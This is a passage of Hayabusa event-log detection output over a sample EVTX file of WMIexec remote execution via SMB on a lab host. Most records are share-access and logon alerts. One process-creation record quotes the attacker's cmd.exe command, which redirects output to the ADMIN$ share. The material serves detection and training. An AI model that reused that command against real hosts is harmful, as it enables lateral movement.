0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.499 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.515 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.515 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.530 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x980 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.530 +00:00,fs03vuln.offsec.lan,4688,high,,Hermetic Wiper TG Process Patterns,,rules/sigma/process_creation_builtin/proc_creation_win_mal_hermetic_wiper_activity.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.530 +00:00,fs03vuln.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.549 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.549 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.549 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.549 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.565 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:03.565 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.801 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.801 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.801 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.801 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.801 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:16.817 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:27.649 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:28.551 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.306 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.321 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.321 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\DesktopTileResources\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.321 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Downloaded Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.337 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.337 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ImmersiveControlPanel\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.337 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\media\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.352 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Offline Web Pages\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.368 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ToastData\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.368 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.384 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ar | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.384 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\bg | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\cs | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\da | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\de | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\el | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\en | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\es | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\et | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.402 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\fr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\he | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\hu | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\it | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ja | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\ko | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.416 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ADFS\lt | IP Addr: 10.23.23.9 | LID: 